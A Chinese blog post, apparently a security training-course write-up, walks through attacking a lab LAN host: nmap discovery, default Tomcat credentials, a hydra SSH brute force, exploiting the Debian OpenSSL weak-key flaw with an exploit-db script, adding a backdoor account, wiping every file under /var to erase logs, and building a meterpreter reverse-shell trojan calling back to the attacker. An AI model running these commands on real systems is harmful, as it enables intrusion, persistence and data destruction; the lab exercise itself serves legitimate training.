您的位置:首页 > 其它

局域网攻击演示(网安实训第五天)

2018-06-22 17:16 176 查看

 

局域网攻击演示

(1)信息收集

1对局域网进行主机发现扫描:

nmap -sP 192.168.183.0/24

2确定攻击目标:本机ip地址为129,内网中还存在另一台主机,ip为134,这就是我们的目标,我们对它进一步扫描。

nmap -sV 192.168.183.134

通过分析,我们发现:目标主机开启大量可利用端口,ftp、ssh、telnet、smtp、mysql可以进行暴力破解,对方主机也开启了80端口,apache版本为2.2.8,php版本为5.2.4。

3放大招,使用nessus进行漏洞扫描。

4在web扫描这里,我发现一些严重漏洞,这一个可以直接登陆进去:


在这里,我们发现以下信息:

  网址:http://192.168.183.134:8180/manager/html

  用户名:tomcat

  密码:tomcat

  网址:http://192.168.183.134:8180/host-manager/html

  用户名:tomcat

  密码:tomcat

  网址:http://192.168.183.134:8180/manager/status

  用户名:tomcat

  密码:tomcat

好像发现了新大陆,我们继续寻找可用信息。

我们发现管理员路径为admin:

好像没太大用,由于时间比较紧,我们进行下一步。

(2)漏洞发现

通过分析上一步的扫描结果,分析得到以下信息:

找到漏洞编号:

CVE:  CVE-2009-3099CVE-2009-3548CVE-2010-0557CVE-2010-4094

继续寻找之前nessus的扫描结果,找到以下内容:

找到漏洞编号:

找到漏洞编号,cve-2008-0166

(3)渗透测试攻击

1暴力破解

在扫描期间,我们先用hydra暴力破解试试,说不定运气好呢。

hydra -l root -P pass.txt –t 50 -e ns192.168.183.134 ssh

最开始使用上面命令,老是出现could not connect to target,查询了发现时因为线程开太多,被对方封了,所以改成1就可以正常运行。

hydra -l root -P pass.txt -t 1 -vV192.168.183.134 ssh

Success: 'root':'ubuntu' 还是root权限,接下来,直接用xshell连接就好了。

(5)创建账户

Useradd hack

Passwd hack

123

123

(6)清除日志文件

find   /var   -type   f  -exec   rm   -v   {}   \;

通过暴力破解,我们已经获得对方shell,这样好像有点简单。我想继续根据之前获取的信息进行攻击。

2漏洞攻击

Msfconsole搜索,发现并没有:

找到cve官网关于本漏洞的说明:

直接下载利用说明:

根据文档内容进行操作:

首先下载密钥文件:

上传到bt5并解压:

使用/pentest/exploits/exploitdb/searchsploit openssl搜索利用脚本文件:

我们随表找一个,我这里使用python脚本。

find / -name 5720.py

进入/pentest/exploits/exploitdb/platforms/linux/remote/,并执行破解:

python 5720.py /root/rsa/2048192.168.183.134 root

结果如下:

执行:

ssh -lroot -p22 -i/root/rsa/2048/57c3115d77c56390332dc5c49978627a-5429 192.168.183.134

成功获取对方shell。

(4)植入木马

生成木马:

msfpayload linux/x86/meterpreter/reverse_tcpLHOST=192.168.183.129 LPORT=55555 X > runme

将木马上传至目标主机:

在攻击机中开启服务端:

如果目标机不小心运行了木马文件,攻击机即可获得反弹shell。

 

阅读更多
内容来自用户分享和网络整理,不保证内容的准确性,如有侵权内容,可联系管理员处理 点击这里给我发消息
标签: